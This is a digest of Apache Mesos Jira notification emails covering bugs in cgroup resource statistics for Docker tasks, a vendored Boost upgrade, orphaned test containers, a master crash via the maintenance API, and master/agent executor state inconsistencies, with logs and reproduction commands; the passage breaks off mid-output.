[jira] [Created] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.
Chun-Hung Hsiao created MESOS-8480: -- Summary: Mesos returns high resource usage when killing a Docker task. Key: MESOS-8480 URL: https://issues.apache.org/jira/browse/MESOS-8480 Project: Mesos Issue Type: Bug Components: cgroups Reporter: Chun-Hung Hsiao Assignee: Chun-Hung Hsiao The way we get resource statistics for Docker tasks is through getting the cgroup subsystem path through {{/proc//docker}} first (taking the {{cpuacct}} subsystem as an example): {noformat} 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b {noformat} Then read {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}} to get the statistics: {noformat} user 4 system 0 {noformat} However, when a Docker container is being teared down, it seems that Docker or the operation system will first move the process to the root cgroup before actually killing it, making {{/proc//docker}} look like the following: {noformat} 9:cpuacct,cpu:/ {noformat} This makes [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935] return a single '/', which in turn makes [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991] read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the statistics for the root cgroup: {noformat} user 228058750 system 24506461 {noformat} This can be reproduced through test.cpp with the following command: {noformat} $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep ... Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat' user 4 system 0 Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' user 228058750 system 24506461 Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' user 228058750 system 24506461 Failed to open file '/proc/44224/cgroup' sleep [2]- Exit 1 ./test $(docker inspect sleep | jq .[].State.Pid) {noformat} -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Created] (MESOS-8479) Document agne SIGUSR1 behavior.
James Peach created MESOS-8479: -- Summary: Document agne SIGUSR1 behavior. Key: MESOS-8479 URL: https://issues.apache.org/jira/browse/MESOS-8479 Project: Mesos Issue Type: Bug Components: agent, documentation Reporter: James Peach The agent enters shutdown when it receives {{SIGUSR1}}. We should document what this means, the corresponding behavior and how operators are intended to use this. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-3915) Upgrade vendored Boost
[ https://issues.apache.org/jira/browse/MESOS-3915?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Benjamin Bannier updated MESOS-3915: Shepherd: Benjamin Bannier > Upgrade vendored Boost > -- > > Key: MESOS-3915 > URL: https://issues.apache.org/jira/browse/MESOS-3915 > Project: Mesos > Issue Type: Bug >Reporter: Neil Conway >Assignee: Benno Evers >Priority: Minor > Labels: boost, mesosphere, tech-debt > Fix For: 1.6.0 > > > We should upgrade the vendored version of Boost to a newer version. Benefits: > * -Should properly fix MESOS-688- > * -Should fix MESOS-3799- > * Generally speaking, using a more modern version of Boost means we can take > advantage of bug fixes, optimizations, and new features. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Commented] (MESOS-3915) Upgrade vendored Boost
[ https://issues.apache.org/jira/browse/MESOS-3915?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336296#comment-16336296 ] Benjamin Bannier commented on MESOS-3915: - {noformat} commit ce0905fcb31a10ade0962a89235fa90b01edf01a Author: Benjamin BannierDate: Tue Jan 23 14:47:37 2018 +0100 Updated mesos-tidy setup for upgraded Boost version. In a previous commit we updated the bundled Boost version. This patch updates the mesos-tidy setup to make sure we build the correct bundled Boost version when creating analysis prerequisites. Review: https://reviews.apache.org/r/65215/ commit a01b4c272848702d5bd3dd899e610a5459c4e57c Author: Benno Evers Date: Tue Jan 23 14:47:32 2018 +0100 Removed duplicate block in configure.ac. This blocks seems to have been copy/pasted from another place. Review: https://reviews.apache.org/r/62445/ commit 469363d4322c7acda7fd10acbe8822f610af5a43 Author: Benno Evers Date: Tue Jan 23 14:47:31 2018 +0100 Updated boost version. Review: https://reviews.apache.org/r/62161/ commit cd2774efde5e55cc027721086af14fbc78688849 Author: Benno Evers Date: Tue Jan 23 14:47:28 2018 +0100 Added UNREACHABLE() macro to __cxa_pure_virtual. The function __cxa_pure_virtual must not return, but newer versions of clang detect that the expansion of the RAW_LOG() macro contains returning code paths for arguments other than FATAL. Review: https://reviews.apache.org/r/62444/ commit a892a2e80255291e6cd5cb3b0e90b9a029989c99 Author: Benno Evers Date: Tue Jan 23 14:47:24 2018 +0100 Fixed stout build with newer boost versions. Starting from Boost 1.62, Boost.Variant added additional compile-time checks to its constructors to fix this issue: https://svn.boost.org/trac10/ticket/11602 However, this breaks some places in stout which try to access a derived class from a variant holding the base class. Review: https://reviews.apache.org/r/62160/ {noformat} > Upgrade vendored Boost > -- > > Key: MESOS-3915 > URL: https://issues.apache.org/jira/browse/MESOS-3915 > Project: Mesos > Issue Type: Bug >Reporter: Neil Conway >Assignee: Benno Evers >Priority: Minor > Labels: boost, mesosphere, tech-debt > Fix For: 1.6.0 > > > We should upgrade the vendored version of Boost to a newer version. Benefits: > * -Should properly fix MESOS-688- > * -Should fix MESOS-3799- > * Generally speaking, using a more modern version of Boost means we can take > advantage of bug fixes, optimizations, and new features. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Assigned] (MESOS-3915) Upgrade vendored Boost
[ https://issues.apache.org/jira/browse/MESOS-3915?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Benjamin Bannier reassigned MESOS-3915: --- Resolution: Fixed Assignee: Benno Evers Fix Version/s: 1.6.0 Closing this one as we have moved the bundled Boost to 1.65.0 after fixing issues preventing such an upgrade. > Upgrade vendored Boost > -- > > Key: MESOS-3915 > URL: https://issues.apache.org/jira/browse/MESOS-3915 > Project: Mesos > Issue Type: Bug >Reporter: Neil Conway >Assignee: Benno Evers >Priority: Minor > Labels: boost, mesosphere, tech-debt > Fix For: 1.6.0 > > > We should upgrade the vendored version of Boost to a newer version. Benefits: > * -Should properly fix MESOS-688- > * -Should fix MESOS-3799- > * Generally speaking, using a more modern version of Boost means we can take > advantage of bug fixes, optimizations, and new features. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Comment Edited] (MESOS-7506) Multiple tests leave orphan containers.
[ https://issues.apache.org/jira/browse/MESOS-7506?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336272#comment-16336272 ] Andrei Budnik edited comment on MESOS-7506 at 1/23/18 7:20 PM: --- While recovery is in progress for [the first slave|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/containerizer/linux_capabilities_isolator_tests.cpp#L733], calling [`StartSlave()`|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/containerizer/linux_capabilities_isolator_tests.cpp#L738] leads to calling [slave::Containerizer::create()|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/cluster.cpp#L431] to create a containerizer. An attempt to create a mesos c'zer, leads to calling [`cgroups::prepare`|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/slave/containerizer/mesos/linux_launcher.cpp#L124]. Finally, we get to the point, where we try to create a ["test" container|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/linux/cgroups.cpp#L476]. So, the recovery process for the first slave [might detect|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/slave/containerizer/mesos/linux_launcher.cpp#L268-L301] this "test" container as an orphaned container. So, there is the race between recovery process for the first slave and an attempt to create a c'zer for the second agent. was (Author: abudnik): While recovery is in progress for [the first slave|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/containerizer/linux_capabilities_isolator_tests.cpp#L733], calling [`StartSlave()`|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/containerizer/linux_capabilities_isolator_tests.cpp#L738] leads to calling [slave::Containerizer::create()|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/cluster.cpp#L431] to create a containerizer. An attempt to create a mesos c'zer, leads to calling [`cgroups::prepare`|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/slave/containerizer/mesos/linux_launcher.cpp#L124]. Finally, we get to the point, where we try to create a ["test" container|[https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/linux/cgroups.cpp#L476].] So, the recovery process for the first slave [might detect|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/slave/containerizer/mesos/linux_launcher.cpp#L268-L301] this "test" container as an orphaned container. So, there is the race between recovery process for the first slave and an attempt to create a c'zer for the second agent. > Multiple tests leave orphan containers. > --- > > Key: MESOS-7506 > URL: https://issues.apache.org/jira/browse/MESOS-7506 > Project: Mesos > Issue Type: Bug > Components: containerization > Environment: Ubuntu 16.04 > Fedora 23 > other Linux distros >Reporter: Alexander Rukletsov >Assignee: Andrei Budnik >Priority: Major > Labels: containerizer, flaky-test, mesosphere > Attachments: KillMultipleTasks-badrun.txt, > ROOT_IsolatorFlags-badrun.txt, ROOT_IsolatorFlags-badrun2.txt, > ROOT_IsolatorFlags-badrun3.txt, ReconcileTasksMissingFromSlave-badrun.txt, > ResourceLimitation-badrun.txt, ResourceLimitation-badrun2.txt, > RestartSlaveRequireExecutorAuthentication-badrun.txt, > TaskWithFileURI-badrun.txt > > > I've observed a number of flaky tests that leave orphan containers upon > cleanup. A typical log looks like this: > {noformat} > ../../src/tests/cluster.cpp:580: Failure > Value of: containers->empty() > Actual: false > Expected: true > Failed to destroy containers: { da3e8aa8-98e7-4e72-a8fd-5d0bae960014 } > {noformat} > All currently affected tests: > {noformat} > SlaveTest.RestartSlaveRequireExecutorAuthentication // cannot reproduce any > more > ROOT_IsolatorFlags > {noformat} -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Commented] (MESOS-7506) Multiple tests leave orphan containers.
[ https://issues.apache.org/jira/browse/MESOS-7506?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336272#comment-16336272 ] Andrei Budnik commented on MESOS-7506: -- While recovery is in progress for [the first slave|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/containerizer/linux_capabilities_isolator_tests.cpp#L733], calling [`StartSlave()`|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/containerizer/linux_capabilities_isolator_tests.cpp#L738] leads to calling [slave::Containerizer::create()|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/cluster.cpp#L431] to create a containerizer. An attempt to create a mesos c'zer, leads to calling [`cgroups::prepare`|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/slave/containerizer/mesos/linux_launcher.cpp#L124]. Finally, we get to the point, where we try to create a ["test" container|[https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/linux/cgroups.cpp#L476].] So, the recovery process for the first slave [might detect|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/slave/containerizer/mesos/linux_launcher.cpp#L268-L301] this "test" container as an orphaned container. So, there is the race between recovery process for the first slave and an attempt to create a c'zer for the second agent. > Multiple tests leave orphan containers. > --- > > Key: MESOS-7506 > URL: https://issues.apache.org/jira/browse/MESOS-7506 > Project: Mesos > Issue Type: Bug > Components: containerization > Environment: Ubuntu 16.04 > Fedora 23 > other Linux distros >Reporter: Alexander Rukletsov >Assignee: Andrei Budnik >Priority: Major > Labels: containerizer, flaky-test, mesosphere > Attachments: KillMultipleTasks-badrun.txt, > ROOT_IsolatorFlags-badrun.txt, ROOT_IsolatorFlags-badrun2.txt, > ROOT_IsolatorFlags-badrun3.txt, ReconcileTasksMissingFromSlave-badrun.txt, > ResourceLimitation-badrun.txt, ResourceLimitation-badrun2.txt, > RestartSlaveRequireExecutorAuthentication-badrun.txt, > TaskWithFileURI-badrun.txt > > > I've observed a number of flaky tests that leave orphan containers upon > cleanup. A typical log looks like this: > {noformat} > ../../src/tests/cluster.cpp:580: Failure > Value of: containers->empty() > Actual: false > Expected: true > Failed to destroy containers: { da3e8aa8-98e7-4e72-a8fd-5d0bae960014 } > {noformat} > All currently affected tests: > {noformat} > SlaveTest.RestartSlaveRequireExecutorAuthentication // cannot reproduce any > more > ROOT_IsolatorFlags > {noformat} -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Commented] (MESOS-6804) Running 'tty' inside a debug container that has a tty reports "Not a tty"
[ https://issues.apache.org/jira/browse/MESOS-6804?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336247#comment-16336247 ] Vinod Kone commented on MESOS-6804: --- Making this an improvement because tty applications work properly. The only issue is if someone types `tty` after attaching. > Running 'tty' inside a debug container that has a tty reports "Not a tty" > - > > Key: MESOS-6804 > URL: https://issues.apache.org/jira/browse/MESOS-6804 > Project: Mesos > Issue Type: Improvement >Reporter: Kevin Klues >Priority: Major > Labels: debugging, mesosphere > > We need to inject `/dev/console` into the container and map it to the slave > end of the TTY we are attached to. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-6804) Running 'tty' inside a debug container that has a tty reports "Not a tty"
[ https://issues.apache.org/jira/browse/MESOS-6804?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Vinod Kone updated MESOS-6804: -- Priority: Major (was: Critical) > Running 'tty' inside a debug container that has a tty reports "Not a tty" > - > > Key: MESOS-6804 > URL: https://issues.apache.org/jira/browse/MESOS-6804 > Project: Mesos > Issue Type: Improvement >Reporter: Kevin Klues >Priority: Major > Labels: debugging, mesosphere > > We need to inject `/dev/console` into the container and map it to the slave > end of the TTY we are attached to. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-6804) Running 'tty' inside a debug container that has a tty reports "Not a tty"
[ https://issues.apache.org/jira/browse/MESOS-6804?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Vinod Kone updated MESOS-6804: -- Issue Type: Improvement (was: Bug) > Running 'tty' inside a debug container that has a tty reports "Not a tty" > - > > Key: MESOS-6804 > URL: https://issues.apache.org/jira/browse/MESOS-6804 > Project: Mesos > Issue Type: Improvement >Reporter: Kevin Klues >Priority: Critical > Labels: debugging, mesosphere > > We need to inject `/dev/console` into the container and map it to the slave > end of the TTY we are attached to. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-7966) check for maintenance on agent causes fatal error
[ https://issues.apache.org/jira/browse/MESOS-7966?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Vinod Kone updated MESOS-7966: -- Sprint: Mesosphere Sprint 66, Mesosphere Sprint 74 (was: Mesosphere Sprint 66) > check for maintenance on agent causes fatal error > - > > Key: MESOS-7966 > URL: https://issues.apache.org/jira/browse/MESOS-7966 > Project: Mesos > Issue Type: Bug > Components: master >Affects Versions: 1.1.0 >Reporter: Rob Johnson >Assignee: Joseph Wu >Priority: Critical > Labels: reliability > > We interact with the maintenance API frequently to orchestrate gracefully > draining agents of tasks without impacting service availability. > Occasionally we seem to trigger a fatal error in Mesos when interacting with > the api. This happens relatively frequently, and impacts us when downstream > frameworks (marathon) react badly to leader elections. > Here is the log line that we see when the master dies: > {code} > F0911 12:18:49.543401 123748 hierarchical.cpp:872] Check failed: > slaves[slaveId].maintenance.isSome() > {code} > It's quite possibly we're using the maintenance API in the wrong way. We're > happy to provide any other logs you need - please let me know what would be > useful for debugging. > Thanks. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Commented] (MESOS-7966) check for maintenance on agent causes fatal error
[ https://issues.apache.org/jira/browse/MESOS-7966?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336243#comment-16336243 ] Vinod Kone commented on MESOS-7966: --- [~kaysoky] Can you work on it in this sprint? > check for maintenance on agent causes fatal error > - > > Key: MESOS-7966 > URL: https://issues.apache.org/jira/browse/MESOS-7966 > Project: Mesos > Issue Type: Bug > Components: master >Affects Versions: 1.1.0 >Reporter: Rob Johnson >Assignee: Joseph Wu >Priority: Critical > Labels: reliability > > We interact with the maintenance API frequently to orchestrate gracefully > draining agents of tasks without impacting service availability. > Occasionally we seem to trigger a fatal error in Mesos when interacting with > the api. This happens relatively frequently, and impacts us when downstream > frameworks (marathon) react badly to leader elections. > Here is the log line that we see when the master dies: > {code} > F0911 12:18:49.543401 123748 hierarchical.cpp:872] Check failed: > slaves[slaveId].maintenance.isSome() > {code} > It's quite possibly we're using the maintenance API in the wrong way. We're > happy to provide any other logs you need - please let me know what would be > useful for debugging. > Thanks. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Assigned] (MESOS-7966) check for maintenance on agent causes fatal error
[ https://issues.apache.org/jira/browse/MESOS-7966?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Vinod Kone reassigned MESOS-7966: - Assignee: Joseph Wu (was: Alexander Rukletsov) > check for maintenance on agent causes fatal error > - > > Key: MESOS-7966 > URL: https://issues.apache.org/jira/browse/MESOS-7966 > Project: Mesos > Issue Type: Bug > Components: master >Affects Versions: 1.1.0 >Reporter: Rob Johnson >Assignee: Joseph Wu >Priority: Critical > Labels: reliability > > We interact with the maintenance API frequently to orchestrate gracefully > draining agents of tasks without impacting service availability. > Occasionally we seem to trigger a fatal error in Mesos when interacting with > the api. This happens relatively frequently, and impacts us when downstream > frameworks (marathon) react badly to leader elections. > Here is the log line that we see when the master dies: > {code} > F0911 12:18:49.543401 123748 hierarchical.cpp:872] Check failed: > slaves[slaveId].maintenance.isSome() > {code} > It's quite possibly we're using the maintenance API in the wrong way. We're > happy to provide any other logs you need - please let me know what would be > useful for debugging. > Thanks. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-7622) Agent can crash if a HTTP executor tries to retry subscription in running state.
[ https://issues.apache.org/jira/browse/MESOS-7622?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Vinod Kone updated MESOS-7622: -- Sprint: Mesosphere Sprint 74 > Agent can crash if a HTTP executor tries to retry subscription in running > state. > > > Key: MESOS-7622 > URL: https://issues.apache.org/jira/browse/MESOS-7622 > Project: Mesos > Issue Type: Bug > Components: agent, executor >Affects Versions: 1.2.2 >Reporter: Aaron Wood >Assignee: Anand Mazumdar >Priority: Critical > > It is possible that a running executor might retry its subscribe request. > This can lead to a crash if it previously had any launched tasks. Note that > the executor would still be able to subscribe again when the agent process > restarts and is recovering. > {code} > sudo ./mesos-agent --master=10.0.2.15:5050 --work_dir=/tmp/slave > --isolation=cgroups/cpu,cgroups/mem,disk/du,network/cni,filesystem/linux,docker/runtime > --image_providers=docker --image_provisioner_backend=overlay > --containerizers=mesos --launcher_dir=$(pwd) > --executor_environment_variables='{"LD_LIBRARY_PATH": > "/home/aaron/Code/src/mesos/build/src/.libs"}' > WARNING: Logging before InitGoogleLogging() is written to STDERR > I0605 14:58:23.748180 10710 main.cpp:323] Build: 2017-06-02 17:09:05 UTC by > aaron > I0605 14:58:23.748252 10710 main.cpp:324] Version: 1.4.0 > I0605 14:58:23.755409 10710 systemd.cpp:238] systemd version `232` detected > I0605 14:58:23.755450 10710 main.cpp:433] Initializing systemd state > I0605 14:58:23.763049 10710 systemd.cpp:326] Started systemd slice > `mesos_executors.slice` > I0605 14:58:23.763777 10710 resolver.cpp:69] Creating default secret resolver > I0605 14:58:23.764214 10710 containerizer.cpp:230] Using isolation: > cgroups/cpu,cgroups/mem,disk/du,network/cni,filesystem/linux,docker/runtime,volume/image,environment_secret > I0605 14:58:23.767192 10710 linux_launcher.cpp:150] Using > /sys/fs/cgroup/freezer as the freezer hierarchy for the Linux launcher > E0605 14:58:23.770179 10710 shell.hpp:107] Command 'hadoop version 2>&1' > failed; this is the output: > sh: 1: hadoop: not found > I0605 14:58:23.770217 10710 fetcher.cpp:69] Skipping URI fetcher plugin > 'hadoop' as it could not be created: Failed to create HDFS client: Failed to > execute 'hadoop version 2>&1'; the command was either not found or exited > with a non-zero exit status: 127 > I0605 14:58:23.770643 10710 provisioner.cpp:255] Using default backend > 'overlay' > I0605 14:58:23.785892 10710 slave.cpp:248] Mesos agent started on > (1)@127.0.1.1:5051 > I0605 14:58:23.785957 10710 slave.cpp:249] Flags at startup: > --appc_simple_discovery_uri_prefix="http://; > --appc_store_dir="/tmp/mesos/store/appc" --authenticate_http_readonly="false" > --authenticate_http_readwrite="false" --authenticatee="crammd5" > --authentication_backoff_factor="1secs" --authorizer="local" > --cgroups_cpu_enable_pids_and_tids_count="false" --cgroups_enable_cfs="false" > --cgroups_hierarchy="/sys/fs/cgroup" --cgroups_limit_swap="false" > --cgroups_root="mesos" --container_disk_watch_interval="15secs" > --containerizers="mesos" --default_role="*" --disk_watch_interval="1mins" > --docker="docker" --docker_kill_orphans="true" > --docker_registry="https://registry-1.docker.io; --docker_remove_delay="6hrs" > --docker_socket="/var/run/docker.sock" --docker_stop_timeout="0ns" > --docker_store_dir="/tmp/mesos/store/docker" > --docker_volume_checkpoint_dir="/var/run/mesos/isolators/docker/volume" > --enforce_container_disk_quota="false" > --executor_environment_variables="{"LD_LIBRARY_PATH":"\/home\/aaron\/Code\/src\/mesos\/build\/src\/.libs"}" > --executor_registration_timeout="1mins" > --executor_reregistration_timeout="2secs" > --executor_shutdown_grace_period="5secs" > --fetcher_cache_dir="/tmp/mesos/fetch" --fetcher_cache_size="2GB" > --frameworks_home="" --gc_delay="1weeks" --gc_disk_headroom="0.1" > --hadoop_home="" --help="false" --hostname_lookup="true" > --http_command_executor="false" --http_heartbeat_interval="30secs" > --image_providers="docker" --image_provisioner_backend="overlay" > --initialize_driver_logging="true" > --isolation="cgroups/cpu,cgroups/mem,disk/du,network/cni,filesystem/linux,docker/runtime" > --launcher="linux" --launcher_dir="/home/aaron/Code/src/mesos/build/src" > --logbufsecs="0" --logging_level="INFO" --master="10.0.2.15:5050" > --max_completed_executors_per_framework="150" > --oversubscribed_resources_interval="15secs" --perf_duration="10secs" > --perf_interval="1mins" --port="5051" --qos_correction_interval_min="0ns" > --quiet="false" --recover="reconnect" --recovery_timeout="15mins" > --registration_backoff_factor="1secs" --revocable_cpu_low_priority="true" >
[jira] [Updated] (MESOS-7911) Non-checkpointing framework's tasks should not be marked LOST when agent disconnects.
[ https://issues.apache.org/jira/browse/MESOS-7911?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Vinod Kone updated MESOS-7911: -- Sprint: Mesosphere Sprint 74 > Non-checkpointing framework's tasks should not be marked LOST when agent > disconnects. > - > > Key: MESOS-7911 > URL: https://issues.apache.org/jira/browse/MESOS-7911 > Project: Mesos > Issue Type: Bug >Reporter: Benjamin Mahler >Priority: Critical > Labels: reliability > > Currently, when framework with checkpointing disabled has tasks running on an > agent and that agent disconnects from the master, the master will mark those > tasks LOST and remove them from its memory. The assumption is that the agent > is disconnecting because it terminated. > However, it's possible that this disconnection occurred due to a transient > loss of connectivity and the agent re-connects while never having terminated. > This case violates our assumption of there being no unknown tasks to the > master: > ``` > void Master::reconcileKnownSlave( > Slave* slave, > const vector& executors, > const vector& tasks) > { > ... > // TODO(bmahler): There's an implicit assumption here the slave > // cannot have tasks unknown to the master. This _should_ be the > // case since the causal relationship is: > // slave removes task -> master removes task > // Add error logging for any violations of this assumption! > ``` > As a result, the tasks would remain on the agent but the master would not > know about them! > A more appropriate action here would be: > (1) When an agent disconnects, mark the tasks as unreachable. > (a) If the framework is not partition aware, only show it the last known > task state. > (b) If the framework is partition aware, let it know that it's now > unreachable. > (2) If the agent re-connects: > (a) And the agent had restarted, let the non-checkpointing framework know > its tasks are GONE/LOST. > (b) If the agent still holds the tasks, the tasks are restored as reachable. > (3) If the agent gets removed: > (a) For partition aware non-checkpointing frameworks, let them know the > tasks are unreachable. > (b) For non partition aware non-checkpointing frameworks, let them know the > tasks are lost and kill them if the agent comes back. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Assigned] (MESOS-7911) Non-checkpointing framework's tasks should not be marked LOST when agent disconnects.
[ https://issues.apache.org/jira/browse/MESOS-7911?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Vinod Kone reassigned MESOS-7911: - Assignee: (was: Gilbert Song) > Non-checkpointing framework's tasks should not be marked LOST when agent > disconnects. > - > > Key: MESOS-7911 > URL: https://issues.apache.org/jira/browse/MESOS-7911 > Project: Mesos > Issue Type: Bug >Reporter: Benjamin Mahler >Priority: Critical > Labels: reliability > > Currently, when framework with checkpointing disabled has tasks running on an > agent and that agent disconnects from the master, the master will mark those > tasks LOST and remove them from its memory. The assumption is that the agent > is disconnecting because it terminated. > However, it's possible that this disconnection occurred due to a transient > loss of connectivity and the agent re-connects while never having terminated. > This case violates our assumption of there being no unknown tasks to the > master: > ``` > void Master::reconcileKnownSlave( > Slave* slave, > const vector& executors, > const vector& tasks) > { > ... > // TODO(bmahler): There's an implicit assumption here the slave > // cannot have tasks unknown to the master. This _should_ be the > // case since the causal relationship is: > // slave removes task -> master removes task > // Add error logging for any violations of this assumption! > ``` > As a result, the tasks would remain on the agent but the master would not > know about them! > A more appropriate action here would be: > (1) When an agent disconnects, mark the tasks as unreachable. > (a) If the framework is not partition aware, only show it the last known > task state. > (b) If the framework is partition aware, let it know that it's now > unreachable. > (2) If the agent re-connects: > (a) And the agent had restarted, let the non-checkpointing framework know > its tasks are GONE/LOST. > (b) If the agent still holds the tasks, the tasks are restored as reachable. > (3) If the agent gets removed: > (a) For partition aware non-checkpointing frameworks, let them know the > tasks are unreachable. > (b) For non partition aware non-checkpointing frameworks, let them know the > tasks are lost and kill them if the agent comes back. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-7887) `GET_EXECUTORS` and `/state` is not consistent between master and agent
[ https://issues.apache.org/jira/browse/MESOS-7887?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Vinod Kone updated MESOS-7887: -- Priority: Minor (was: Critical) > `GET_EXECUTORS` and `/state` is not consistent between master and agent > --- > > Key: MESOS-7887 > URL: https://issues.apache.org/jira/browse/MESOS-7887 > Project: Mesos > Issue Type: Improvement > Components: HTTP API, master >Affects Versions: 1.3.0, 1.5.0 >Reporter: Alexander Rojas >Priority: Minor > Labels: master, mesosphere, v1_api > > The master seem not to keep information about the executors since they are > not returned either either by getting the master state (with either v0 and v1 > API's) or with the call {{GET_EXECUTORS}}. Creating a cluster as follows: > {noformat} > ./bin/mesos-master.sh \ > --ip=${MASTER_IP} \ > --work_dir=/tmp/mesos/master \ > --log_dir=/tmp/mesos/master/log > {noformat} > {noformat} > sudo ./bin/mesos-agent.sh \ > --master=${MASTER_IP}:5050 \ > --work_dir=/tmp/mesos/agent \ > --log_dir=/tmp/mesos/agent/log \ > --containerizers=mesos,docker > {noformat} > And launch a couple of frameworks as follows: > {noformat} > ./src/mesos-execute \ > --master=${MASTER_IP}:5050 \ > > --task='{"name":"test-custom-command","task_id":{"value":"test-custom-command-task-1"},"agent_id":{"value":"50f4e551-aa5c-42db-8967-4dc3ee11658f-S0"},"resources":[{"name":"cpus","type":"SCALAR","scalar":{"value":1}},{"name":"mem","type":"SCALAR","scalar":{"value":32}},{"name":"disk","type":"SCALAR","scalar":{"value":32}}],"executor":{"executor_id":{"value":"test-custom-command-executor"},"command":{"value":"while > true; do echo \"Hello World\"; sleep 5; done;"}}}' > {noformat} > {noformat} > ./src/mesos-execute \ > --master=${MASTER_IP}:5050 \ > --name=test-command \ > --command='while true; do echo "Hello World"; sleep 5; done;' \ > --containerizer=docker \ > --docker_image=ubuntu:latest > {noformat} > Not using the operator endpoints on the agent: > {noformat} > $ http POST ${AGENT_IP}:5051/api/v1 type=GET_EXECUTORS > { > "get_executors": { > "completed_executors": [ > ], > "executors": [ > { > "executor_info": { > "command": { > "arguments": [ > "mesos-executor", > "--launcher_dir=/workspace/mesos/build/src" > ], > "shell": false, > "value": "/workspace/mesos/build/src/mesos-executor" > }, > "container": { > "docker": { > "image": "ubuntu:latest", > "network": "HOST", > "privileged": false > }, > "type": "DOCKER" > }, > "executor_id": { > "value": "test-command" > }, > "framework_id": { > "value": "87577bcd-093d-4240-a24b-107b4d1d21bd-0001" > }, > "name": "Command Executor (Task: test-command) (Command: sh -c > 'while true; ...')", > "resources": [ > { > "allocation_info": { > "role": "*" > }, > "name": "cpus", > "scalar": { > "value": 0.1 > }, > "type": "SCALAR" > }, > { > "allocation_info": { > "role": "*" > }, > "name": "mem", > "scalar": { > "value": 32 > }, > "type": "SCALAR" > } > ], > "source": "test-command" > } > }, > { > "executor_info": { > "command": { > "shell": true, > "value": "while true; do echo \"Hello World\"; sleep 5; done;" > }, > "executor_id": { > "value": "test-custom-command-executor" > }, > "framework_id": { > "value": "87577bcd-093d-4240-a24b-107b4d1d21bd-" > } > } > } > ] > }, > "type": "GET_EXECUTORS" > } > {noformat} > While the master does > {noformat} > http POST ${MASTER_IP}:5050/api/v1 type=GET_EXECUTORS > { > "get_executors": 